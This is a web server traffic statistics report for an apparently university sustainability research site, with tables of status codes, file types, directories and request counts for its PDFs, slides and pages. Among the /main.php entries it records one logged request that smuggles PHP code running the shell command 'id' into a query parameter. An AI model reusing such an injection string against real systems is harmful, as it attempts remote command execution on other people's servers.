| 3570 | 304 Not modified since last retrieval |
| 6 | 400 Bad request |
| 45 | 403 Access forbidden |
| 14965 | 404 Document not found |
| 9 | 405 Method not allowed |
| 15 | 416 Requested range not valid |
| 2 | 501 Request type not supported |
| 2 | 503 Service temporarily unavailable |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the sizes of files.
| size | reqs | %bytes |
|---|---|---|
| 0 | 9136 | |
| 1B- 10B | 84 | |
| 11B- 100B | 452 | |
| 101B- 1kB | 7151 | 0.01% |
| 1kB- 10kB | 65441 | 0.56% |
| 10kB-100kB | 77673 | 4.05% |
| 100kB- 1MB | 26093 | 20.08% |
| 1MB- 10MB | 15283 | 66.25% |
| 10MB-100MB | 114 | 3.44% |
| 100MB- 1GB | 13 | 5.61% |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the extensions of files.
Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.
| reqs | %bytes | extension |
|---|---|---|
| 71868 | 79.31% | .pdf [Adobe Portable Document Format] |
| 11692 | 9.33% | .ppt |
| 7644 | 5.07% | [directories] |
| 6860 | 2.47% | .php [PHP] |
| 42784 | 1.61% | [no extension] |
| 9016 | 0.71% | .jpg [JPEG graphics] |
| 5220 | 0.46% | .js [JavaScript code] |
| 9657 | 0.31% | .css [Cascading Style Sheets] |
| 651 | 0.26% | .swf |
| 21811 | 0.13% | .gif [GIF graphics] |
| 11 | 0.12% | .pptx |
| 14226 | 0.23% | [not listed: 36 extensions] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the directories from which files were requested. (The figures for each directory include all of its subdirectories.)
Listing directories with at least 0.1% of the traffic, sorted by the amount of traffic.
| reqs | Gbytes | %bytes | %reqs | directory |
|---|---|---|---|---|
| 76548 | 37.22 | 81.06% | 38.00% | /css_doc/ |
| 6470 | 3.57 | 7.78% | 3.21% | /assets/ |
| 14476 | 3.45 | 7.51% | 7.19% | [root directory] |
| 50707 | 0.77 | 1.68% | 25.17% | /sites/ |
| 12965 | 0.16 | 0.35% | 6.44% | /person/ |
| 5815 | 0.14 | 0.31% | 2.89% | /facts/ |
| 3454 | 0.12 | 0.25% | 1.71% | /research/ |
| 7865 | 0.12 | 0.25% | 3.90% | /publication/ |
| 2639 | 0.09 | 0.20% | 1.31% | /publications/ |
| 4073 | 0.06 | 0.13% | 2.02% | /project/ |
| 3427 | 0.05 | 0.10% | 1.70% | /event/ |
| 13001 | 0.17 | 0.37% | 6.45% | [not listed: 745 directories] |
(Go To: Top | General Summary | Weekly Report | Daily Report | Daily Summary | Hourly Summary | Domain Report | Organisation Report | Host Report | Referrer Report | Search Word Report | Browser Report | Browser Summary | Operating System Report | Status Code Report | File Size Report | File Type Report | Directory Report | Request Report)
This report lists the files on the site.
Listing files, sorted by the number of requests.
| reqs | Gbytes | %bytes | %reqs | file |
|---|---|---|---|---|
| 7513 | 8.61 | 18.76% | 3.73% | /css_doc/CSS05-10.pdf |
| 6517 | 2.90 | 6.32% | 3.24% | /css_doc/Pollution.ppt |
| 6120 | 0.79 | 1.73% | 3.04% | /assets/Bierbaum_WegeLectureSlides.pdf |
| 5899 | 2.32 | 5.05% | 2.93% | / |
| 3747 | 0.14 | 0.30% | 1.86% | /sites/css.snre.umich.edu/files/css/css_ac8ab24b119ec02c550c871ce6bf530e.css |
| 3539 | 0.00 | 0.01% | 1.76% | /sites/css.snre.umich.edu/files/css/css_d2434abce713867d75aff3b890b4982a.css |
| 3525 | 0.00 | 0.01% | 1.75% | /sites/css.snre.umich.edu/themes/CSSSNRE/logo.png |
| 3480 | 0.02 | 0.05% | 1.73% | /sites/css.snre.umich.edu/themes/CSSSNRE/images/Banner3.jpg |
| 3438 | 0.15 | 0.33% | 1.71% | /sites/css.snre.umich.edu/files/js/js_785e27942c18141d93ed2ab24f79269b.js |
| 3371 | 0.01 | 0.01% | 1.67% | /sites/css.snre.umich.edu/themes/CSSSNRE/images/wordmark.gif |
| 3324 | 0.56 | 1.22% | 1.65% | /css_doc/CSS00-04.pdf |
| 3295 | 0.00 | 0.01% | 1.64% | /sites/css.snre.umich.edu/themes/CSSSNRE/favicon.ico |
| 3275 | 0.01 | 0.02% | 1.63% | /sites/css.snre.umich.edu/themes/CSSSNRE/images/sustainability.gif |
| 3264 | 0.00 | 0.01% | 1.62% | /robots.txt |
| 3228 | 0.91 | 1.97% | 1.60% | /css_doc/CSS03-02.pdf |
| 2828 | 0.49 | 1.08% | 1.40% | /css_doc/Energy.ppt |
| 2661 | 1.45 | 3.17% | 1.32% | /css_doc/CSS05-09.pdf |
| 2418 | 0.33 | 0.72% | 1.20% | /css_doc/CSS04-14.pdf |
| 2307 | 0.54 | 1.17% | 1.15% | /css_doc/CSS04-13.pdf |
| 2177 | 0.33 | 0.72% | 1.08% | /css_doc/CSS01-06.pdf |
| 2149 | 0.42 | 0.91% | 1.07% | /css_doc/CSS93-02.pdf |
| 1870 | 1.09 | 2.38% | 0.93% | /index.php |
| 12 | 0.00 | 0.01% | 0.01% | /index.php?gclid=CN_Mg6vh4pUCFQEGQQodCFoVeA |
| 1736 | 0.68 | 1.48% | 0.86% | /css_doc/CSS07-04.pdf |
| 1699 | 0.16 | 0.35% | 0.84% | /css_doc/CSS04-15.pdf |
| 1537 | 3.50 | 7.63% | 0.76% | /css_doc/CSS03-04.pdf |
| 1437 | 1.77 | 3.86% | 0.71% | /css_doc/CSS03-07.pdf |
| 1386 | 0.07 | 0.16% | 0.69% | /publications/all |
| 52 | 0.00 | 0.03% | /publications/all?tid=9&field_pub_type_value_many_to_one=Journal+Article | |
| 45 | 0.00 | 0.02% | /publications/all?tid=10&field_pub_type_value_many_to_one=Journal+Article | |
| 36 | 0.00 | 0.02% | /publications/all?order=title&sort=desc&tid=9&field_pub_type_value_many_to_one=Journal Article | |
| 28 | 0.00 | 0.01% | /publications/all?order=field_pub_date_value&sort=desc&tid=10&field_pub_type_value_many_to_one=Journal Article | |
| 28 | 0.00 | 0.01% | /publications/all?order=field_pub_date_value&sort=desc&tid=9&field_pub_type_value_many_to_one=Journal Article | |
| 21 | 0.00 | 0.01% | /publications/all?order=field_pub_type_value&sort=asc&tid=All&field_pub_type_value_many_to_one=Factsheet | |
| 12 | 0.00 | 0.01% | /publications/all?order=field_pub_type_value&sort=desc&tid=All&field_pub_type_value_many_to_one=Factsheet | |
| 1314 | 0.13 | 0.29% | 0.65% | /css_doc/CSS05-05.pdf |
| 1306 | 0.15 | 0.33% | 0.65% | /css_doc/CSS11-01.pdf |
| 1291 | 0.00 | 0.64% | /sites/css.snre.umich.edu/themes/CSSSNRE/css/ie.css | |
| 1287 | 0.00 | 0.64% | /sites/css.snre.umich.edu/themes/CSSSNRE/css/ie.css?I | |
| 1262 | 0.29 | 0.64% | 0.63% | /css_doc/CSS04-03.pdf |
| 1261 | 0.38 | 0.83% | 0.63% | /css_doc/CSS97-01.pdf |
| 1249 | 0.04 | 0.08% | 0.62% | /research/projects |
| 52 | 0.00 | 0.03% | /research/projects?tid=5 | |
| 48 | 0.00 | 0.02% | /research/projects?tid=4 | |
| 37 | 0.00 | 0.02% | /research/projects?tid=1 | |
| 36 | 0.00 | 0.02% | /research/projects?tid=11 | |
| 31 | 0.00 | 0.02% | /research/projects?tid=10 | |
| 29 | 0.00 | 0.01% | /research/projects?tid=2 | |
| 27 | 0.00 | 0.01% | /research/projects?tid=8 | |
| 25 | 0.00 | 0.01% | /research/projects?tid=3 | |
| 23 | 0.00 | 0.01% | /research/projects?tid=6 | |
| 23 | 0.00 | 0.01% | /research/projects?tid=7 | |
| 20 | 0.00 | 0.01% | /research/projects?tid=9 | |
| 13 | 0.00 | 0.01% | /research/projects?order=title&sort=asc&tid=1 | |
| 13 | 0.00 | 0.01% | /research/projects?order=title&sort=asc&tid=9 | |
| 13 | 0.00 | 0.01% | /research/projects?order=field_start_date_value&sort=asc&tid=11 | |
| 12 | 0.00 | 0.01% | /research/projects?order=title&sort=asc&tid=2 | |
| 12 | 0.00 | 0.01% | /research/projects?order=field_start_date_value&sort=asc | |
| 12 | 0.00 | 0.01% | /research/projects?order=field_last_date_value&sort=asc | |
| 11 | 0.00 | 0.01% | /research/projects?order=field_start_date_value&sort=asc&tid=7 | |
| 11 | 0.00 | 0.01% | /research/projects?order=title&sort=asc&tid=10 | |
| 10 | 0.00 | /research/projects?order=field_last_date_value&sort=desc&tid=7 | ||
| 10 | 0.00 | /research/projects?order=title&sort=asc&tid=7 | ||
| 10 | 0.00 | /research/projects?order=field_last_date_value&sort=asc&tid=2 | ||
| 10 | 0.00 | /research/projects?order=field_last_date_value&sort=asc&tid=4 | ||
| 10 | 0.00 | /research/projects?order=field_last_date_value&sort=asc&tid=5 | ||
| 10 | 0.00 | /research/projects?order=field_last_date_value&sort=asc&tid=6 | ||
| 10 | 0.00 | /research/projects?order=title&sort=asc | ||
| 1202 | 0.02 | 0.03% | 0.60% | /publications/factsheets |
| 15 | 0.00 | 0.01% | /publications/factsheets?gclid=CPTxv_ar_KMCFQIB4wod5Va9IA | |
| 12 | 0.00 | 0.01% | /publications/factsheets?gclid=CKTht6e8_KMCFUte4woduxw_JA | |
| 11 | 0.00 | 0.01% | /publications/factsheets?gclid=CKm987bO6qwCFWZNpgodqXEUIw | |
| 1197 | 0.10 | 0.21% | 0.59% | /css_doc/CSS08-15.pdf |
| 1174 | 0.12 | 0.27% | 0.58% | /css_doc/CSS03-12.pdf |
| 1068 | 3.65 | 7.95% | 0.53% | /css_doc/CSS04-08.pdf |
| 1009 | 0.09 | 0.19% | 0.50% | /css_doc/CSS05-17.pdf |
| 969 | 1.13 | 2.46% | 0.48% | /css_doc/CSS94-01.pdf |
| 912 | 0.35 | 0.76% | 0.45% | /css_doc/CSS07-02.pdf |
| 812 | 0.10 | 0.22% | 0.40% | /css_doc/CSS01-01.pdf |
| 792 | 0.00 | 0.01% | 0.39% | /facts/ |
| 781 | 0.07 | 0.15% | 0.39% | /css_doc/CSS08-08.pdf |
| 740 | 0.28 | 0.62% | 0.37% | /css_doc/CSS00-02.pdf |
| 726 | 0.15 | 0.32% | 0.36% | /sites/css.snre.umich.edu/files/ifa_upload/CSS_staff_2010_2.jpg |
| 720 | 0.08 | 0.17% | 0.36% | /css_doc/CSS05-21.pdf |
| 699 | 0.10 | 0.21% | 0.35% | /css_doc/CSS04-06.pdf |
| 698 | 0.02 | 0.03% | 0.35% | /research/byresearchsectors |
| 25 | 0.00 | 0.01% | /research/byresearchsectors?tid=5 | |
| 24 | 0.00 | 0.01% | /research/byresearchsectors?tid=4 | |
| 22 | 0.00 | 0.01% | /research/byresearchsectors?tid=2 | |
| 22 | 0.00 | 0.01% | /research/byresearchsectors?tid=6 | |
| 20 | 0.00 | 0.01% | /research/byresearchsectors?tid=3 | |
| 19 | 0.00 | 0.01% | /research/byresearchsectors?tid=1 | |
| 19 | 0.00 | 0.01% | /research/byresearchsectors?tid=10 | |
| 17 | 0.00 | 0.01% | /research/byresearchsectors?tid=9 | |
| 17 | 0.00 | 0.01% | /research/byresearchsectors?tid=11 | |
| 16 | 0.00 | 0.01% | /research/byresearchsectors?tid=8 | |
| 15 | 0.00 | 0.01% | /research/byresearchsectors?tid=7 | |
| 11 | 0.00 | 0.01% | /research/byresearchsectors?order=field_pub_date_value&sort=asc&tid=1 | |
| 11 | 0.00 | 0.01% | /research/byresearchsectors?order=field_pub_date_value&sort=asc&tid=9 | |
| 10 | 0.00 | /research/byresearchsectors?order=title&sort=asc&tid=6 | ||
| 10 | 0.00 | /research/byresearchsectors?order=title&sort=desc&tid=10 | ||
| 692 | 0.04 | 0.08% | 0.34% | /css_doc/Ch1.pdf |
| 671 | 0.00 | 0.33% | /facts/style.css | |
| 663 | 0.43 | 0.94% | 0.33% | /css_doc/Ecology.ppt |
| 662 | 0.00 | 0.01% | 0.33% | /facts/Scripts/AC_RunActiveContent.js |
| 656 | 0.00 | 0.01% | 0.33% | /facts/banner.gif |
| 644 | 0.08 | 0.18% | 0.32% | /css_doc/CSS09-05.pdf |
| 626 | 0.01 | 0.02% | 0.31% | /about/external-advisory-board |
| 624 | 0.06 | 0.13% | 0.31% | /css_doc/CSS09-15.pdf |
| 608 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/wsd_btn.gif | |
| 607 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/pt_btn.gif | |
| 607 | 0.00 | 0.01% | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/es_btn.gif |
| 607 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/sodev_btn.gif | |
| 606 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/pe_btn.gif | |
| 606 | 0.00 | 0.01% | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/biodiv_btn.gif |
| 606 | 0.04 | 0.09% | 0.30% | /css_doc/GlobalChange_OD.ppt |
| 606 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/footcarbon_btn.gif | |
| 605 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/re_btn.gif | |
| 605 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/fs_btn.gif | |
| 605 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/foot_btn.gif | |
| 605 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/ccpm_btn.gif | |
| 605 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/bfuels_btn.gif | |
| 605 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/city_btn.gif | |
| 604 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/cb_btn.gif | |
| 604 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/wt_btn.gif | |
| 603 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/mtl_btn.gif | |
| 603 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/we_btn.gif | |
| 602 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/msw_btn.gif | |
| 601 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/it_btn.gif | |
| 601 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/rb_btn.gif | |
| 600 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/gh_btn.gif | |
| 598 | 0.00 | 0.30% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/ifa_upload/ccsi_btn.gif | |
| 541 | 0.20 | 0.44% | 0.27% | /css_doc/env_law.ppt |
| 540 | 0.10 | 0.22% | 0.27% | /facts/earthDay_04.swf |
| 514 | 0.06 | 0.13% | 0.26% | /css_doc/CSS07-08.pdf |
| 493 | 0.00 | 0.01% | 0.24% | /about/index.php |
| 489 | 0.02 | 0.05% | 0.24% | /events/all |
| 22 | 0.00 | 0.01% | /events/all?order=field_event_date_value&sort=desc | |
| 19 | 0.00 | 0.01% | /events/all?order=field_location_value&sort=asc | |
| 16 | 0.00 | 0.01% | /events/all?field_event_type_value_many_to_one=All | |
| 15 | 0.00 | 0.01% | /events/all?order=title&sort=asc | |
| 13 | 0.00 | 0.01% | /events/all?order=field_event_date_value&sort=asc | |
| 12 | 0.00 | 0.01% | /events/all?field_event_type_value_many_to_one=Seminar | |
| 11 | 0.00 | 0.01% | /events/all?order=field_event_date_value&sort=desc&field_event_type_value_many_to_one=All | |
| 447 | 0.14 | 0.31% | 0.22% | /css_doc/CSS05-19.pdf |
| 446 | 0.00 | 0.22% | /misc/arrow-asc.png | |
| 433 | 0.03 | 0.06% | 0.21% | /css_doc/CSS09-11.pdf |
| 423 | 0.11 | 0.23% | 0.21% | /css_doc/CSS08-03.pdf |
| 414 | 0.00 | 0.01% | 0.21% | /education/teaching-resources |
| 31 | 0.00 | 0.02% | /education/teaching-resources?gclid=CJPO6b2g16UCFYIa6wod0w5dkw | |
| 30 | 0.00 | 0.01% | /education/teaching-resources?gclid=CPXj-ruf-KYCFcse4Qod3VXYFQ | |
| 27 | 0.00 | 0.01% | /education/teaching-resources?gclid=CLqw25zz46UCFUUa6wodLBzkzw | |
| 408 | 0.06 | 0.14% | 0.20% | /css_doc/CSS09-06.pdf |
| 407 | 0.04 | 0.09% | 0.20% | /css_doc/CSS01-08.pdf |
| 405 | 0.06 | 0.13% | 0.20% | /css_doc/CSS04-12.pdf |
| 398 | 0.00 | 0.20% | /css_doc/ | |
| 384 | 0.04 | 0.09% | 0.19% | /css_doc/CSS05-18.pdf |
| 350 | 0.06 | 0.14% | 0.17% | /css_doc/CSS06-11.pdf |
| 348 | 0.00 | 0.01% | 0.17% | /css_doc |
| 342 | 0.13 | 0.28% | 0.17% | /css_doc/Sustainability_Criteria_for_Water_Resource_Systems_Book.pdf |
| 334 | 0.13 | 0.29% | 0.17% | /css_doc/CSS07-05.pdf |
| 333 | 0.00 | 0.01% | 0.17% | /research/researchareas |
| 330 | 0.21 | 0.45% | 0.16% | /css_doc/CSS11-12.pdf |
| 328 | 0.03 | 0.05% | 0.16% | /css_doc/CSS01-07.pdf |
| 314 | 0.03 | 0.06% | 0.16% | /research/researchers |
| 24 | 0.00 | 0.01% | 0.01% | /research/researchers?order=field_last_name_value&sort=desc |
| 20 | 0.00 | 0.01% | 0.01% | /research/researchers?order=field_first_name_value&sort=asc |
| 314 | 0.02 | 0.05% | 0.16% | /css_doc/CSS03-11.pdf |
| 311 | 0.01 | 0.02% | 0.15% | /research/researchers/facultyaffiliates |
| 34 | 0.00 | 0.02% | /research/researchers/facultyaffiliates?order=field_last_name_value&sort=asc | |
| 27 | 0.00 | 0.01% | /research/researchers/facultyaffiliates?field_status_person_value_many_to_one=Current | |
| 13 | 0.00 | 0.01% | /research/researchers/facultyaffiliates?order=field_first_name_value&sort=asc | |
| 11 | 0.00 | 0.01% | /research/researchers/facultyaffiliates?order=field_department_value&sort=asc | |
| 310 | 0.02 | 0.04% | 0.15% | /sites/css.snre.umich.edu/files/js/js_35942a62b095e2133e5e8ee149447cd3.js |
| 310 | 0.04 | 0.08% | 0.15% | /css_doc/CSS07-09.pdf |
| 306 | 0.01 | 0.03% | 0.15% | /about/press |
| 30 | 0.00 | 0.01% | /about/press?order=field_press_date_value&sort=desc | |
| 21 | 0.00 | 0.01% | /about/press?order=field_press_date_value&sort=desc&$Version=0&$Path=/&$Domain=.snre.umich.edu | |
| 20 | 0.00 | 0.01% | /about/press?order=field_publisher_value&sort=asc | |
| 18 | 0.00 | 0.01% | /about/press?order=title&sort=asc | |
| 14 | 0.00 | 0.01% | /about/press?order=field_press_date_value&sort=asc | |
| 305 | 0.00 | 0.01% | 0.15% | /publications |
| 28 | 0.00 | 0.01% | /publications?tid=1&field_author_nid=75 | |
| 21 | 0.00 | 0.01% | /publications?tid=1&field_author_nid=95 | |
| 20 | 0.00 | 0.01% | /publications?order=title&sort=desc | |
| 10 | 0.00 | /publications?tid=1&field_author_nid=91 | ||
| 303 | 0.22 | 0.49% | 0.15% | /css_doc/CSS01-03.pdf |
| 301 | 0.05 | 0.12% | 0.15% | /css_doc/CSS06-08.pdf |
| 295 | 0.10 | 0.23% | 0.15% | /css_doc/CSS97-08.pdf |
| 295 | 0.00 | 0.01% | 0.15% | /research |
| 287 | 0.31 | 0.68% | 0.14% | /css_doc/CSS02-04.pdf |
| 283 | 0.03 | 0.06% | 0.14% | /css_doc/Ch8.pdf |
| 279 | 0.00 | 0.01% | 0.14% | /about/people |
| 276 | 0.00 | 0.14% | /poormanscron/run-cron-check | |
| 270 | 0.00 | 0.01% | 0.13% | /events |
| 29 | 0.00 | 0.01% | /events?order=title&sort=asc | |
| 27 | 0.00 | 0.01% | /events?order=field_location_value&sort=desc | |
| 22 | 0.00 | 0.01% | /events?order=field_location_value&sort=asc | |
| 11 | 0.00 | 0.01% | /events?order=field_event_date_value&sort=asc | |
| 268 | 0.05 | 0.10% | 0.13% | /css_doc/CSS04-02.pdf |
| 268 | 0.06 | 0.13% | 0.13% | /css_doc/CSS04-01.pdf |
| 266 | 0.02 | 0.04% | 0.13% | /sites/css.snre.umich.edu/files/js/js_3f303ec569f503c10767efb4e63fdafe.js |
| 261 | 0.09 | 0.19% | 0.13% | /css_doc/GlobalChange_GHG.ppt |
| 242 | 0.00 | 0.12% | /about | |
| 241 | 0.00 | 0.12% | /main.php | |
| 24 | 0.00 | 0.01% | /main.php?cmd=setquality&var1=1'.passthru('id').'; | |
| 22 | 0.00 | 0.01% | /main.php?control=detail_proj&pr_project_id=29 | |
| 11 | 0.00 | 0.01% | /main.php?control=detail_pub&pu_report_id=31 | |
| 10 | 0.00 | /main.php?control=detail_pub&pu_report_id=51 | ||
| 240 | 0.00 | 0.01% | 0.12% | /education |
| 235 | 0.00 | 0.12% | /education/graduate-programs | |
| 232 | 0.04 | 0.08% | 0.12% | /css_doc/CSS04-04.pdf |
| 227 | 0.12 | 0.27% | 0.11% | /css_doc/CSS09-12.pdf |
| 222 | 0.01 | 0.01% | 0.11% | /events/wege-series |
| 222 | 0.14 | 0.30% | 0.11% | /css_doc/CSS08-01.pdf |
| 217 | 0.00 | 0.11% | /sites/css.snre.umich.edu/modules/ie6update/images/icon.png | |
| 213 | 0.01 | 0.02% | 0.11% | /sites/css.snre.umich.edu/files/js/js_2a3269591ec222d832107879b678e10e.js |
| 207 | 0.00 | 0.10% | /sites/css.snre.umich.edu/modules/ie6update/images/icon-over.png | |
| 205 | 0.00 | 0.10% | /research/research-methods-and-tools | |
| 204 | 0.00 | 0.10% | /facts/quiz.html | |
| 200 | 0.00 | 0.10% | /about/visit | |
| 198 | 0.00 | 0.10% | http://css.snre.umich.edu/css_doc/CSS03-04.pdf | |
| 196 | 0.00 | 0.10% | /sites/css.snre.umich.edu/modules/ie6update/images/close.png | |
| 195 | 0.03 | 0.06% | 0.10% | /css_doc/CSS06-03.pdf |
| 194 | 0.00 | 0.10% | /css_doc/FIFRA.pdf | |
| 193 | 0.00 | 0.10% | /sites/css.snre.umich.edu/modules/ie6update/images/close-over.png | |
| 192 | 0.00 | 0.10% | /about/mission-history | |
| 186 | 0.00 | 0.01% | 0.09% | /education/fellowships |
| 186 | 0.08 | 0.18% | 0.09% | /css_doc/CSS06-10.pdf |
| 175 | 0.03 | 0.07% | 0.09% | /css_doc/CSS07-06.pdf |
| 174 | 0.00 | 0.09% | /register/ | |
| 174 | 0.03 | 0.06% | 0.09% | /css_doc/CSS09-08.pdf |
| 171 | 0.12 | 0.26% | 0.08% | /css_doc/CSS09-14.pdf |
| 167 | 0.00 | 0.08% | /education/student-internships | |
| 165 | 0.00 | 0.08% | /research/research-areas | |
| 160 | 0.07 | 0.14% | 0.08% | /css_doc/CSS07-07.pdf |
| 155 | 0.00 | 0.08% | /css_doc/OSHA.pdf | |
| 154 | 0.02 | 0.04% | 0.08% | /css_doc/CSS09-07.pdf |
| 154 | 0.01 | 0.03% | 0.08% | /css_doc/Materials.ppt |
| 149 | 0.04 | 0.08% | 0.07% | /css_doc/CSS03-18.pdf |
| 148 | 0.00 | 0.07% | /facts/factsheets.html | |
| 146 | 0.00 | 0.07% | /sites/css.snre.umich.edu/files/imagecache/individual_views/defaultperson_1.jpg | |
| 145 | 0.00 | 0.07% | /css_doc/CAA.pdf | |
| 142 | 0.02 | 0.03% | 0.07% | /css_doc/CSS99-02R2.pdf |
| 140 | 0.00 | 0.07% | /about/sponsors | |
| 139 | 0.00 | 0.07% | /facts/tabs/earthdayup.png | |
| 139 | 0.00 | 0.07% | /facts/tabs/dalailamadown.png | |
| 139 | 0.00 | 0.07% | /facts/tabs/footprintcalculatordown.png | |
| 139 | 0.02 | 0.05% | 0.07% | /css_doc/CSS10-07.pdf |
| 135 | 0.00 | 0.01% | 0.07% | /education/archivedfellowships |
| 130 | 0.00 | 0.06% | /publication/risk-analysis-water-resources-education | |
| 129 | 0.00 | 0.06% | /facts/tabs/sponsorsup.png | |
| 128 | 0.01 | 0.03% | 0.06% | /css_doc/CSS08-09.pdf |
| 127 | 0.00 | 0.06% | /person/christine-kirchhoff | |
| 34 | 0.00 | 0.02% | /person/christine-kirchhoff?page=2 | |
| 34 | 0.00 | 0.02% | /person/christine-kirchhoff?page=3 | |
| 25 | 0.00 | 0.01% | /person/christine-kirchhoff?page=4 | |
| 124 | 0.00 | 0.06% | /publication/life-cycle-assessment-office-furniture-products | |
| 123 | 0.00 | 0.06% | /sites/css.snre.umich.edu/themes/CSSSNRE/css/ie6.css | |
| 123 | 0.00 | 0.06% | /sites/css.snre.umich.edu/themes/CSSSNRE/css/ie6.css?I | |
| 123 | 0.00 | 0.06% | /makeframe.php | |
| 23 | 0.00 | 0.01% | /makeframe.php?content=4_2_Factsheets&gclid=CNuiqO__tZQCFQkmIgodNSvbTw | |
| 16 | 0.00 | 0.01% | /makeframe.php?content=4_1_NewPubs | |
| 10 | 0.00 | /makeframe.php?content=4_2_Factsheets | ||
| 121 | 0.00 | 0.06% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/ming_xu.jpg | |
| 121 | 0.00 | 0.06% | /css.snre.umich.edu/about/index.php | |
| 120 | 0.07 | 0.15% | 0.06% | /css_doc/lawmoduleslides.ppt |
| 118 | 0.02 | 0.04% | 0.06% | /css_doc/CSS11-16.pdf |
| 117 | 0.00 | 0.06% | /sites/css.snre.umich.edu/modules/ie6update/ie6update.js | |
| 116 | 0.10 | 0.21% | 0.06% | /css_doc/CSS01-02.pdf |
| 116 | 0.00 | 0.06% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/jarod.jpg | |
| 116 | 0.01 | 0.02% | 0.06% | /css_doc/CSS05-20.pdf |
| 114 | 2.67 | 5.81% | 0.06% | /assets/3rdWegeLecture_Newman.pdf |
| 113 | 0.04 | 0.09% | 0.06% | /css_doc/CSS08-05.pdf |
| 112 | 0.01 | 0.01% | 0.06% | /sites/css.snre.umich.edu/files/js/js_4c831bd24993d247f33a3dbedd8c557f.js |
| 112 | 0.00 | 0.06% | /misc/arrow-desc.png | |
| 112 | 0.08 | 0.17% | 0.06% | /css_doc/CSS95-02.pdf |
| 109 | 0.06 | 0.12% | 0.05% | /css_doc/CSS10-02.pdf |
| 108 | 0.00 | 0.01% | 0.05% | /person/gregory-keoleian |
| 107 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Robb DeKleine.jpg | |
| 107 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Newell_Josh.jpg | |
| 106 | 0.00 | 0.01% | 0.05% | /views/ajax |
| 14 | 0.00 | 0.01% | /views/ajax?field_status_person_value_many_to_one=Current&view_name=people&view_display_id=page_2&view_args=&view_path=research/researchers&view_base_path=research/researchers&view_dom_id=1&pager_element=0 | |
| 106 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Greg-Keoleian.jpg | |
| 106 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/helaine_hunscher.jpg | |
| 106 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/shelie_miller.jpg | |
| 106 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/thumbnail/person/Bulkley.jpg | |
| 105 | 0.00 | 0.05% | /event/2011-annual-technology-forum-us-china-clean-vehicle-consortium | |
| 103 | 0.06 | 0.14% | 0.05% | /css_doc/CSS06-05.pdf |
| 101 | 0.00 | 0.05% | /project/full-life-cycle-costs-organic-versus-conventional-food | |
| 101 | 0.00 | 0.05% | /facts/tabs/factsheetsdown.png | |
| 99 | 0.00 | 0.01% | 0.05% | /sites/css.snre.umich.edu/files/imagecache/highlight_view/highlight/US calorie intake trends.png |
| 99 | 0.36 | 0.79% | 0.05% | /css_doc/CSS08-02.pdf |
| 98 | 0.01 | 0.02% | 0.05% | /sites/css.snre.umich.edu/files/imagecache/highlight_view/highlight/ghana village.png |
| 98 | 0.00 | 0.05% | /css_doc/NEPA.pdf | |
| 97 | 0.16 | 0.35% | 0.05% | /css_doc/CSS10-04.pdf |
| 96 | 0.01 | 0.02% | 0.05% | /css_doc/Ch5.pdf |
| 94 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/highlight_view/highlight/Water Uses.jpg | |
| 94 | 0.00 | 0.05% | /event/10th-peter-m-wege-lecture-sustainability-featuring-larry-brilliant | |
| 93 | 0.00 | 0.05% | /sites/css.snre.umich.edu/files/imagecache/highlight_view/highlight/Environmental Footprint 2.jpg | |
| 93 | 0.00 | 0.05% | http://css.snre.umich.edu/css_doc/CSS00-04.pdf | |
